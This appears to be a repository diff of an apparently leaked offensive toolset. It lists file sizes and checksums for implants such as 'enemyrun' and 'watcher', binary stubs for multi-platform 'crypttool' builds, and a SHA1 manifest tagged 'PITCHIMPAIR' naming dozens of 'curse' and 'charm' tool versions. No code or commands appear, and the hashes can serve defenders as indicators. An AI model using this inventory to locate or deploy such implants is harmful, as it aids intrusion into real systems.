curseroot.sunos5.8_v.2.0.0.3.00000 156004 1488178427 29645 44513
|
||||||
|
enemyrun.sunos5.8_v.4.0.0.5 247300 3177778343 13495 26331
|
||||||
|
enemyrun.hpux11.00_v.4.0.0.5 262144 1926578269 09648 63946
|
||||||
|
enemyrun.linuxrhe3.6_v.4.0.0.5 187440 3094616716 62935 33784
|
||||||
|
enemyrun.sunos5.8.i386_v.4.0.0.5 248056 3974196642 48504 10837
|
||||||
|
enemyrun.linuxrh7.3_v.4.0.0.5 191268 4200784184 11041 52133
|
||||||
|
enemyrun.hpux11.00_v.4.0.1.2 266240 3996943980 63730 37023
|
||||||
|
enemyrun.linuxrhe3.6_v.4.0.1.2 191884 2727046206 21612 17426
|
||||||
|
enemyrun.sunos5.8.i386_v.4.0.1.2 251508 1617290894 42605 46413
|
||||||
|
enemyrun.linuxrh7.3_v.4.0.1.2 195992 1526794153 18101 17592
|
||||||
|
enemyrun.sunos5.8_v.4.0.1.2 253140 813274482 19935 16838
|
||||||
|
skimcountry.sunos5.8_v.2.0.0.3 149916 1621673867 56926 19684
|
||||||
|
skimcountry.aix5.1_v.2.0.0.3 203776 3254804545 10599 32810
|
||||||
|
skimcountry__flx.aix5.1.powerpc_v.1.0.0.4 270833 591709200 28185 10148
|
||||||
|
skimcountry__flx.aix5.1.powerpc_v.1.0.1.1 276901 515577067 26565 39849
|
||||||
|
store-linux-i386_v.3.1.1.2 19081 4046454450 57236 58067
|
||||||
|
watcher-linux-i386_v.3.1.1.2 240245 4137883497 27567 61892
|
||||||
|
watcher-linux-x86_64_v.3.1.1.2 283993 445808546 45899 51305
|
||||||
|
watcher-solaris-sparc_v.3.1.1.2 238700 3123728883 65114 59049
|
||||||
|
watcher-solaris-i386_v.3.1.1.2 240689 1896067598 54991 52090
|
||||||
|
store-linux-i386_v.3.2.0.1 19081 3859061399 26804 57751
|
||||||
|
watcher-linux-i386_v.3.2.0.1 247221 1290560138 55884 54861
|
||||||
|
watcher-linux-x86_64_v.3.2.0.1 292185 1865728922 45347 41273
|
||||||
|
watcher-solaris-sparc_v.3.2.0.1 245364 345828695 56969 15267
|
||||||
|
watcher-solaris-i386_v.3.2.0.1 247889 1993261621 24880 16141
|
||||||
|
store-linux-i386_v.3.3.0.1 19081 2404995396 06163 58327
|
||||||
|
watcher-linux-i386_v.3.3.0.1 254581 3229610433 00846 7940
|
||||||
|
watcher-linux-x86_64_v.3.3.0.1 304729 3900419060 40597 17151
|
||||||
|
watcher-solaris-sparc_v.3.3.0.1 246796 3831178132 20083 7168
|
||||||
|
watcher-solaris-i386_v.3.3.0.1 249329 45734773 04632 57529
|
BIN
archive_files/crypttool/crypttool/crypttool.aix5.1_v.2.0.1.3
Executable file
BIN
archive_files/crypttool/crypttool/crypttool.aix5.1_v.2.0.1.3
Executable file
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.aix5.1_v.2.1.0.2
Normal file
BIN
archive_files/crypttool/crypttool/crypttool.aix5.1_v.2.1.0.2
Normal file
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.hpuxb.11.00_v.2.0.1.3
Executable file
BIN
archive_files/crypttool/crypttool/crypttool.hpuxb.11.00_v.2.0.1.3
Executable file
Binary file not shown.
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.linux2.4.18-3_v.2.0.1.3
Executable file
BIN
archive_files/crypttool/crypttool/crypttool.linux2.4.18-3_v.2.0.1.3
Executable file
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.linux2.4.18-3_v.2.1.0.2
Executable file
BIN
archive_files/crypttool/crypttool/crypttool.linux2.4.18-3_v.2.1.0.2
Executable file
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.sunos5.8.i386_v.2.0.1.3
Executable file
BIN
archive_files/crypttool/crypttool/crypttool.sunos5.8.i386_v.2.0.1.3
Executable file
Binary file not shown.
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.sunos5.8.sparc_v.2.0.1.3
Executable file
BIN
archive_files/crypttool/crypttool/crypttool.sunos5.8.sparc_v.2.0.1.3
Executable file
Binary file not shown.
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.win2k_v.2.0.1.3
Executable file
BIN
archive_files/crypttool/crypttool/crypttool.win2k_v.2.0.1.3
Executable file
Binary file not shown.
BIN
archive_files/crypttool/crypttool/crypttool.win2k_v.2.1.0.2
Normal file
BIN
archive_files/crypttool/crypttool/crypttool.win2k_v.2.1.0.2
Normal file
Binary file not shown.
165
archive_files/crypttool/tools.sha1sums.txt
Normal file
165
archive_files/crypttool/tools.sha1sums.txt
Normal file
|
@ -0,0 +1,165 @@
|
||||||
|
3DC70B280A3191CE13EA0AA37367D985162D89FB Fri Oct 19 17:51:32 2012 [PITCHIMPAIR.xx] charm_hammer.linuxrh7.3.i686_v.1.0.0.3
|
||||||
|
092290E03075FA55B66874398E72EE3956F15F3B Fri May 18 14:48:32 2012 [PITCHIMPAIR.xx] charm_penguin.sunos5.8_v.2.0.1.4
|
||||||
|
745A652564161CDD09BE5FB188D37F7029F6A167 Tue Jun 15 18:04:46 2010 [PITCHIMPAIR.xx] charm_razor.win2k_v.2.0.0.1
|
||||||
|
34288D6AEE12B7413901998B0E5ECD57A50980F6 Thu Nov 8 15:20:26 2012 [PITCHIMPAIR.xx] charm_razor.linux2.6.5-7.97-smp.i686_v.2.1.0.2
|
||||||
|
9B1608CD4BFCD8D6970187589AE999E0829C81B7 Thu Jun 3 16:21:12 2010 [PITCHIMPAIR.xx] charm_saver.hpux11.00_v.2.0.0.2
|
||||||
|
AA7D6B77B5C000314C856431883DF2B0D12EC046 Tue May 4 17:03:39 2010 [PITCHIMPAIR.xx] charm_saver.win2k_v.2.0.0.2
|
||||||
|
30B0CBBFB4F6F9CBF40A0A18E08B4C71231D2B1D Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.sparc_v.2.0.1.3
|
||||||
|
ED3FA710317E7D0BCDED864C7766E9D8530AE238 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.linux2.4.18-3_v.2.0.1.3
|
||||||
|
36821190B36342B1ED7C5FE185D3B4FD0F820B43 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.i386_v.2.0.1.3
|
||||||
|
5F5B1285967393B7A2485EBE3ADEF9D2047E4CA8 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.win2k_v.2.0.1.3
|
||||||
|
F52340918751E515BBF9B4B111EAFE81E28874E0 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.hpuxb.11.00_v.2.0.1.3
|
||||||
|
1A0B601B7A2B72606D4193E5A5E7D4A610C9CA7F Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.aix5.1_v.2.0.1.3
|
||||||
|
9096C1AA8ECEDA532F47F82572ED5534F33FA4C7 Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.sparc_v.2.1.0.2
|
||||||
|
937F493E538B96C29F48A5957B16B0356498998B Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.linux2.4.18-3_v.2.1.0.2
|
||||||
|
A69F4E110877B015D2909B8F54BC18169A589F47 Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.i386_v.2.1.0.2
|
||||||
|
954F4778E5CD7A31B575B8C3C5B69A24D753E87B Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.win2k_v.2.1.0.2
|
||||||
|
80A7419E7A8CFD28E0E790F79AC518EEFEAE93CA Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.hpuxb.11.00_v.2.1.0.2
|
||||||
|
93249C66F57121DEBD98395E0B5A10517CA25DD4 Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.aix5.1_v.2.1.0.2
|
||||||
|
908A7347F0622960E8225BF3206636111CBE0AED Mon May 3 12:24:51 2010 [PITCHIMPAIR.xx] cursebongo.sunos5.8_v.2.0.0.1
|
||||||
|
0D4A01E9C4F0683078650DD94CCE24BAE65168C5 Tue Jun 5 13:16:47 2012 [PITCHIMPAIR.xx] curseclash.aix5.1.powerpc_v.1.0.1.1
|
||||||
|
C81DAF1D7D76DA410857A90953E8D7A1909D948F Wed Oct 10 11:44:56 2012 [PITCHIMPAIR.xx] curseclash_flx.sunos5.8.sparc_v.1.0.0.3
|
||||||
|
93E018FB88F01C223B11C4F6026E321B29A59853 Wed Oct 10 11:44:56 2012 [PITCHIMPAIR.xx] curseclash_flx.aix5.1.powerpc_v.1.0.0.3
|
||||||
|
4635E05651DBCD3F2EDA4A174D7C33F01DE1C9C3 Wed Jun 15 12:36:05 2011 [PITCHIMPAIR.xx] cursedevo.sunos5.8_v.1.0.0.3
|
||||||
|
E4A544206B0501E67F16A26093428AC334A973E5 Fri Dec 7 21:11:59 2012 [PITCHIMPAIR.xx] cursefire.linuxrh7.3.i686_v.1.1.0.2
|
||||||
|
19ABD4D601359BB4ECF8B9697DAAA7F6BEA9F402 Mon Jun 4 12:39:14 2012 [PITCHIMPAIR.xx] cursefire.sunos5.8.sparc_v.1.0.0.3
|
||||||
|
DCD5465C9327A0AFE309A116AB428B6EA95B60FE Tue Aug 11 16:34:57 2009 [PITCHIMPAIR.xx] curseflower.mswin32_v.1.0.0.3
|
||||||
|
475EE14BB59E2CBF1625AC75C269F44C0577E5D0 Wed Oct 10 11:33:56 2012 [PITCHIMPAIR.xx] cursegismo.sunos5.8.sparc_v.2.2.0.2
|
||||||
|
327901EDA008636E3A944B82D44FF16F14A863AE Wed Oct 10 11:33:56 2012 [PITCHIMPAIR.xx] cursegismo.sunos5.8.i386_v.2.2.0.2
|
||||||
|
C6BEF72471D15F33FEACE85D10CB0F3AD8C1AE78 Wed Oct 10 11:33:56 2012 [PITCHIMPAIR.xx] cursegismo.linuxrh7.3.i686_v.2.2.0.2
|
||||||
|
84B2DDBE9ECACCA5E786079C314AB1F0C935A401 Wed Jan 27 16:36:17 2010 [PITCHIMPAIR.xx] cursegismo.linuxrh7.3_v.2.0.0.2
|
||||||
|
90B50B531E0DB2DFDF885F23E531973B1C85DF24 Wed Jan 27 16:36:17 2010 [PITCHIMPAIR.xx] cursegismo.sunos5.8_v.2.0.0.2
|
||||||
|
3DE069D24A523C10A1F2CF6E53DB86DE4878CA40 Wed Jan 27 16:36:17 2010 [PITCHIMPAIR.xx] cursegismo.hpuxb.11.00_v.2.0.0.2
|
||||||
|
7B73F0EB39A434DAB80BE1F5240AAA8ED3499C28 Fri Feb 11 18:14:28 2011 [PITCHIMPAIR.xx] cursegismo.sunos5.8.i386_v.2.1.0.1
|
||||||
|
CAB5155EF63DC824DE53568A639735310C35EF22 Fri Feb 11 18:14:28 2011 [PITCHIMPAIR.xx] cursegismo.linuxrh7.3_v.2.1.0.1
|
||||||
|
78DA2E62CD6A53B75A38A41DC65950BA10828D87 Fri Feb 11 18:14:28 2011 [PITCHIMPAIR.xx] cursegismo.sunos5.8_v.2.1.0.1
|
||||||
|
91ACE7E5E2073367D810C933E10ABF35432094F7 Fri Feb 11 18:14:29 2011 [PITCHIMPAIR.xx] cursegismo.hpux11.00_v.2.1.0.1
|
||||||
|
133041F8A5206116CF4A14883BC93DD53641C00B Mon Apr 12 14:32:04 2010 [PITCHIMPAIR.xx] cursegismo.sunos5.8.i386_v.2.0.0.5
|
||||||
|
6485249152B9A0DCC327D80F400275CA0703773C Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.win2k_v.6.0.0.1
|
||||||
|
D0E3E98DA05D29FB9802291E744EF1667582D756 Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.rhl7.3_v.6.0.0.1
|
||||||
|
96CE881EA4546F46961475A9D6B0BF40D1B7BE31 Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.hp-uxb.11.00_v.6.0.0.1
|
||||||
|
16C7C11BD8C70F333F16341ABA0DB2BAAD0904FC Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.sunos5.8_v.6.0.0.1
|
||||||
|
00D54B5F950A377E900B64B565DA58FD014EB672 Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.sunos5.8_v.6.1.0.1
|
||||||
|
EDA9AD9BE6CCBCCCDD96EEEADF2E744E4297A5C0 Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.hpux11.00_v.6.1.0.1
|
||||||
|
E79BCE98D9F64ED71CFCA7C6C507FC7723F9861A Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.win2k_v.6.1.0.1
|
||||||
|
D83037BC4E025BABA874E5BBA4079C4205B9B264 Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.linuxrh7.3_v.6.1.0.1
|
||||||
|
AAB569E5B3643DBE07F981EFA6E1F2D68E25B723 Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.linuxrh7.3.unknown_v.6.2.0.3
|
||||||
|
4214A7541803C3AC87C3C491487F11E96FC4B058 Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.hpux11.00.risc_v.6.2.0.3
|
||||||
|
A41EE20E65397DCE5F288B748A52C6D6C4F9154A Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.win2k.i686_v.6.2.0.3
|
||||||
|
397DF64863C130F5BD3C8A1E179C86CD6B48F23F Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.sunos5.8.sparc_v.6.2.0.3
|
||||||
|
AA227C89ACE731945DC53ACF7DC90DECB4C2DBE4 Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.win2k_v.2.1.0.2
|
||||||
|
0D151AB49A9974844A0089B9C576AA6218479512 Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.sunos5.8_v.2.1.0.2
|
||||||
|
2B6ABB47B4C5DF369A794A6FED08CD476470C9FC Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.hpux11.00_v.2.1.0.2
|
||||||
|
0D42734F8F15EDFFB3B73A6DFDE6FC60DC2FC045 Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.aix5.1_v.2.1.0.2
|
||||||
|
FBF7334531AED88C938B61F394FFAAC0FB01D38E Tue Mar 6 12:16:44 2012 [PITCHIMPAIR.xx] cursehelper.win2k.i686_v.2.2.0.4
|
||||||
|
733D6939BD35C01661017299D21DA157EF4FF210 Fri Feb 10 16:05:35 2012 [PITCHIMPAIR.xx] cursehelper.sunos5.8.sparc_v.2.2.0.4
|
||||||
|
68DA058E84F85135CC93836394FE2AA761DAA712 Tue Mar 6 12:16:37 2012 [PITCHIMPAIR.xx] cursehelper.aix5.1.powerpc_v.2.2.0.4
|
||||||
|
5346758117978E6DD9614D06E03F1139436D3BB3 Tue Mar 6 12:16:41 2012 [PITCHIMPAIR.xx] cursehelper.hpux11.00.risc_v.2.2.0.4
|
||||||
|
3DA7D89E3971659334780BEC8B6A41DC57BCD800 Wed Apr 17 12:30:09 2013 [PITCHIMPAIR.xx] cursehelper.linuxrh7.3.i686_v.2.2.1.1
|
||||||
|
0BF3892053FB4F3B9781C0AF0FCB807B5DE8C1DD Tue Jul 10 17:05:24 2012 [PITCHIMPAIR.xx] cursehelper.sunos5.8.i386_v.2.2.0.4
|
||||||
|
3BC7ADFF5142E362048E633ADBE6BF4389B9CB85 Thu Feb 28 16:55:12 2013 [PITCHIMPAIR.xx] cursehole_flx.aix5.1.powerpc_v.1.0.0.4
|
||||||
|
E445C73287B999AC7285765B6EF6FE872A0685F6 Tue Feb 12 14:32:02 2013 [PITCHIMPAIR.xx] cursehole_flx.sunos5.8.sparc_v.1.0.0.3
|
||||||
|
B8009CA04040EBECE514073BD822DA91C3DB7A32 Wed May 16 14:26:19 2012 [PITCHIMPAIR.xx] cursekettle.hpux11.00.risc_v.1.1.0.2
|
||||||
|
ED00A5537A9F0CD8E7E58F6693C607BB33AD7748 Mon Jun 13 18:22:03 2011 [PITCHIMPAIR.xx] cursekiln.sunos5.8_v.1.0.0.2
|
||||||
|
BFAF9F5CF11D26ED93A4BF6359D7AF02A298343C Fri Dec 2 15:23:34 2011 [PITCHIMPAIR.xx] cursekiln.sunos5.8_v.1.0.1.3
|
||||||
|
9BD3FEB3AE384C1592ACC5FEC2B0F8BB740BC405 Fri Apr 9 10:41:47 2010 [PITCHIMPAIR.xx] cursemagic.linuxrh7.3_v.2.0.0.1
|
||||||
|
230335E9756A226A95B86C8EA709320959A3AFE5 Fri Apr 9 10:39:17 2010 [PITCHIMPAIR.xx] cursemagic.solaris5.8_v.2.0.0.1
|
||||||
|
FB1B509AB5167368EE71CA93EECFAAD66D4765C1 Tue Apr 20 18:58:26 2010 [PITCHIMPAIR.xx] cursemagic.solaris5.8_v.2.0.1.1
|
||||||
|
F3D41481F353EE9AC9ED9777F12FFFBAEB814C7F Tue Apr 20 18:58:26 2010 [PITCHIMPAIR.xx] cursemagic.linuxrh7.3_v.2.0.1.1
|
||||||
|
5BD539E66B8EFBC1E6077F22F3CC850E9487222D Wed Apr 21 16:17:24 2010 [PITCHIMPAIR.xx] cursemagic.hpux11.00_v.2.0.1.1
|
||||||
|
26EB533FA7E3EA9559FD71E3B6C470497C3B25F4 Wed Apr 21 16:17:29 2010 [PITCHIMPAIR.xx] cursemagic.aix5.1_v.2.0.1.1
|
||||||
|
F191378B2B009A1DAF0DBEB5F066AC1D981CF12E Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.aix5.1_v.2.1.0.3
|
||||||
|
D1BBDA568B0EFBEEC395203C67659B154A1523FA Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.linuxrh7.3_v.2.1.0.3
|
||||||
|
4E5418CB07531150AF21CFEF2E61CFBC7AA7841F Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.sunos5.8_v.2.1.0.3
|
||||||
|
4DD9975EF41041B5EBB7436D0133E5D2E94AAF36 Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.hpux11.00_v.2.1.0.3
|
||||||
|
5DD669543CDF1C080324BE347E838C8EA9E5FE80 Fri Aug 6 14:28:56 2010 [PITCHIMPAIR.xx] cursenag.sunos5.8_v.1.0.0.1
|
||||||
|
D63912E862CAAC386EDF1581CC57D28DC88CBF00 Thu Jul 15 15:51:43 2010 [PITCHIMPAIR.xx] cursequake.sunos5.8_v.1.0.0.2
|
||||||
|
C45D7E21D425B5DFEEBB35F030101D0CE8102EFE Tue Jun 28 16:51:30 2011 [PITCHIMPAIR.xx] cursequake.sunos5.8_v.1.1.0.4
|
||||||
|
349885662B4C89A399DE5C5CC96BFFC394911E77 Thu Jan 20 19:51:40 2011 [PITCHIMPAIR.xx] curserazor.win2k_v.2.0.0.5
|
||||||
|
CE2AB103A224872A374EBD6AD16C0C63C2A82823 Thu Jan 20 19:51:40 2011 [PITCHIMPAIR.xx] curserazor.sunos5.8_v.2.0.0.5
|
||||||
|
BB8E43C87C436F886F515BCF1439CB214C6FC726 Tue Apr 12 13:41:50 2011 [PITCHIMPAIR.xx] curserazor.win2k_v.2.0.1.1
|
||||||
|
1F36611F0A9E1B9BCF9BDE6E983FBABE628D7F33 Tue Apr 12 13:41:50 2011 [PITCHIMPAIR.xx] curserazor.sunos5.8_v.2.0.1.1
|
||||||
|
B3370BB449078047FB7BB9B8425CDCC2A3015326 Fri Sep 21 17:18:54 2012 [PITCHIMPAIR.xx] curseroot_flx.hpux11.00.risc_v.1.1.0.3
|
||||||
|
7466C5ED2265CA3A9C20B400FB2F848BD45A5B09 Wed Jan 6 19:54:14 2010 [PITCHIMPAIR.xx] curseroot.hpuxb.11.00_v.2.0.0.3
|
||||||
|
7060A7B90CDEE01ED2EC5F2088FF3E280844DCE3 Thu Feb 18 21:01:21 2010 [PITCHIMPAIR.xx] cursetails.aix5.1_v.1.0.0.1
|
||||||
|
F7EA435175DEE6B6D9017120781FB5CB99CF5CD2 Thu Sep 18 16:43:33 2008 [PITCHIMPAIR.xx] cursetingle.aix.5.1_v.1.1.1.1
|
||||||
|
9B6399503D696C83D6EA4073321A20E84B354EAE Thu Aug 27 16:45:39 2009 [PITCHIMPAIR.xx] cursetingle.mswin32_v.2.0.0.1
|
||||||
|
DECFE5F18D8A50525A0C8A9F52503D35A213C267 Tue Jul 31 16:34:49 2012 [PITCHIMPAIR.xx] cursesalsa.hpux11.00.risc_v.1.0.0.1
|
||||||
|
EB36543FF084B04AEE005D848EE3A9568A6674CA Thu Aug 27 16:45:39 2009 [PITCHIMPAIR.xx] cursetingle.sunos5.8_v.2.0.0.1
|
||||||
|
08E4FF1E990A02810623A37796B9FB82D6655F25 Thu Aug 27 16:45:39 2009 [PITCHIMPAIR.xx] cursetingle.aix.5.1_v.2.0.0.1
|
||||||
|
275F529DC13CF184AB70B113F0FECA08D573CCFA Fri Jan 15 13:25:00 2010 [PITCHIMPAIR.xx] cursetingle.aix5.1_v.2.0.1.1
|
||||||
|
8ABAC3C15A23BA4DDCD52114F96B4BB740EFF6B3 Wed Jun 1 14:15:02 2011 [PITCHIMPAIR.xx] cursetingle_flx.aix5.1.powerpc_v.1.0.1.3
|
||||||
|
EC35453289E28A37E562113E9EFB582D125C5222 Thu Jan 21 15:39:40 2010 [PITCHIMPAIR.xx] cursetingle.2.0.1.2.mswin32_v.2.0.1.1
|
||||||
|
6C869E358F34014C1A3EC859C5281871BAE2BD4F Thu Jan 21 15:39:34 2010 [PITCHIMPAIR.xx] cursetingle.sunos5.8_v.2.0.1.1
|
||||||
|
41DC7887C46CCDEA6A771FF0201E29193754FCCF Thu Jul 10 13:14:23 2008 [PITCHIMPAIR.xx] cursetingle.sunos.5.9_v.1.0.0.7
|
||||||
|
D7F9D7433CB9E3F14C6640DE19DFCCD2CB6C295C Thu Jul 10 13:14:15 2008 [PITCHIMPAIR.xx] cursetingle.mswin32_v.1.0.0.7
|
||||||
|
EA087A035E3E01804E8E43C9DA8AB58C25A3038B Tue Mar 20 16:51:45 2012 [PITCHIMPAIR.xx] cursewham.linuxrh7.3.i686_v.1.1.0.1
|
||||||
|
E6D8C35163092B1235B6356214610361B6FBB7DC Tue Feb 28 16:41:16 2012 [PITCHIMPAIR.xx] cursewham.win2k.i686_v.1.1.0.1
|
||||||
|
427536C8C3BBC2B60217AD36F3BB7CE107810933 Thu Aug 11 12:53:41 2011 [PITCHIMPAIR.xx] cursewham.win2k.i686_v.1.0.0.3
|
||||||
|
A58C9E3E5B1AC639A6984D1CA271C568C2AFDCE3 Thu Apr 14 13:14:02 2011 [PITCHIMPAIR.xx] cursezinger_flx.win2k.i686_v.1.0.0.2
|
||||||
|
23D1A5F85A02ECDBF14FE77A7D9C256AE63A1053 Tue Jul 19 16:44:55 2011 [PITCHIMPAIR.xx] cursezinger.win2k_v.2.0.0.2
|
||||||
|
D01B0DBD4496AB9C47E64272AA01EC8AAFC6D84D Tue Jul 19 16:44:55 2011 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.2.0.0.2
|
||||||
|
52FA122317861F7B506BD42435E6A96F48C69514 Fri Jan 27 21:18:13 2012 [PITCHIMPAIR.xx] cursezinger.sunos5.8_v.2.0.0.2
|
||||||
|
8849F4B7B2DD9F106BB1499D9474E9BEE5FF3C64 Wed Jun 16 12:14:36 2010 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.1.0.0.1
|
||||||
|
BC7C9839441097E8D1DA64E9864D0474F2452572 Wed Jun 16 13:01:49 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.0.0.1
|
||||||
|
6E4C1302C79A610EBFA3B24BBAAFA67F438D865B Fri Sep 17 17:06:38 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.1.0.3
|
||||||
|
52432EFB738D4EE975D1064BFCB0E73195991C04 Fri Sep 17 17:06:38 2010 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.1.1.0.3
|
||||||
|
9A6B894B022E311F059EFB50DDB656CEF014DF64 Wed Oct 13 12:41:22 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.2.0.1
|
||||||
|
F6567080A506403DFA7399AA4EBCE64DD9DCDD52 Fri Oct 22 14:37:57 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.2.1.1
|
||||||
|
6BCA7BFF280DCB01D708286E376410C438B6F9B4 Fri Oct 22 14:37:57 2010 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.1.2.1.1
|
||||||
|
206FB9B0C4082713BF196ED46B9804ED396755F6 Mon Jul 23 14:19:24 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_editionhaze.def
|
||||||
|
CF097DD7F41B28BEF37872C3A365F06C745795F8 Mon Jul 23 14:21:07 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_silenttongues.def
|
||||||
|
6CD24B209838FB24E1C315B562BC20DE84E2AECE Mon Jul 23 14:20:57 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_sicklestar.def
|
||||||
|
94FB6A9E314411A8B7E218FE9D90024D7CD2F5BC Mon Jul 23 14:20:20 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_liquidsteel.def
|
||||||
|
F90BF1760240DE17E5FC071F1C3063A05E1DD520 Mon Jul 23 14:20:34 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_serenecosmos.def
|
||||||
|
0D7217C6F1F1A51D7D6FC0CA007256677C3190EF Mon Jul 23 14:21:25 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_wholeblue.def
|
||||||
|
787291960EA1A4A25FCB7CEC211CD6877F3FF283 Mon Jul 23 14:19:13 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_diamondaxe.def
|
||||||
|
2B1F44DB220DC26A58007DA88B0683952B40D520 Mon Jul 23 14:20:46 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_shakengiraffe.def
|
||||||
|
A08866353BC5953B6346F07E0607E4B93504098D Mon Nov 27 20:44:15 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_editionhaze.def
|
||||||
|
258C7D06A42F22F0D2855DB2EE499C5B44BB412B Mon Nov 27 20:45:30 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_silenttongues.def
|
||||||
|
EEF893ED6057D23F410EF37B82F4F7B9478BBDC3 Mon Nov 27 20:45:22 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_sicklestar.def
|
||||||
|
63DE1E981DB1317838756EBCDDAC8483AAF93AFE Mon Nov 27 20:44:41 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_liquidsteel.def
|
||||||
|
42BE054AE4D7EBEB277254A95272B261F0361227 Mon Nov 27 20:45:02 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_serenecosmos.def
|
||||||
|
50D7874B6856A3E89C31CCFE8CBBD02E0FD5E345 Mon Nov 27 20:45:38 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_wholeblue.def
|
||||||
|
0222399D32F29B0539FCDA4FC2122953CED91F95 Mon Nov 27 20:45:14 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_shakengiraffe.def
|
||||||
|
0564E3F02B58EA50F9E37AD41ED8894484A2D0BA Thu Apr 12 11:59:40 2012 [PITCHIMPAIR.xx] curseclash.v1.0.0.3.aix5.1.powerpc_v.superceded
|
||||||
|
C8C5F054286140C25FC96F82F099D76D67E136ED Thu Jul 22 13:03:48 2010 [PITCHIMPAIR.xx] cursetingle_flx.v1.0.0.9.aix5.1.powerpc_v.superceded
|
||||||
|
8CA41956ED63025C8760F3EBD4B704F7C7CB7F70 Wed Jan 2 21:36:42 2008 [PITCHIMPAIR.xx] cursehappy.v4.1.2.4.sunos5.8_v.4.1.2.4_solaris8
|
||||||
|
D5A0ED87A0E5029AA0A8568EFD2F8ACFEFC0DC2E Fri Dec 11 14:04:25 2009 [PITCHIMPAIR.xx] curseroot.aix5.1_v.2.0.0.3.00000
|
||||||
|
7992D84590400AEA7ACCC172402AC497889A4491 Fri Dec 11 14:04:25 2009 [PITCHIMPAIR.xx] curseroot.win2k_v.2.0.0.3.00000
|
||||||
|
BD253FF1DB61808424630608C610E4C7B8A6CC01 Mon Mar 19 12:22:58 2012 [PITCHIMPAIR.xx] curseroot.aix5.1.powerpc_v.2.2.0.7.00001
|
||||||
|
3D7B80D8003A10D08ECA4FFDD595F105FAB50FA3 Wed Mar 28 11:54:51 2012 [PITCHIMPAIR.xx] curseroot.hpux11.00.risc_v.2.2.0.7.00001
|
||||||
|
253E0E246633E603E58DAB97E1D4782FB7DDDA84 Fri Mar 23 11:43:49 2012 [PITCHIMPAIR.xx] curseroot.win2k.i686_v.2.2.0.7.00001
|
||||||
|
8D8996D5B82BC9AAA0310B982FD048FB77644107 Wed Mar 28 11:54:59 2012 [PITCHIMPAIR.xx] curseroot.linux2.6.5-7.97-smp.i686_v.2.2.0.7.00000
|
||||||
|
D114B8EC196B7DEFEEE751CE73932B6F952178BE Wed Mar 28 11:55:10 2012 [PITCHIMPAIR.xx] curseroot.sunos5.8.sparc_v.2.2.0.7.00000
|
||||||
|
